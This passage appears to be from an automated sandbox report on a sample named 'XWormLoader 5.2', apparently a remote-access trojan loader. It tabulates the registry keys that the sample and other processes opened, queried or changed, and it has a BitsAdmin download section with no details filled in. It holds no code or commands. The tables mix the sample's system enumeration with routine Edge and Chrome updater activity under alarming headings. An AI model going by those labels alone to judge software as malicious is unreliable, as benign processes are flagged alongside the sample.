| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\wermgr.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\system32\wwahost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133603380950088431" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell | C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CurVer\ = "ie_to_edge_bho.IEToEdgeBHO.1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\ProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}\ProgID\ = "MicrosoftEdgeUpdate.Update3WebSvc.1.0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
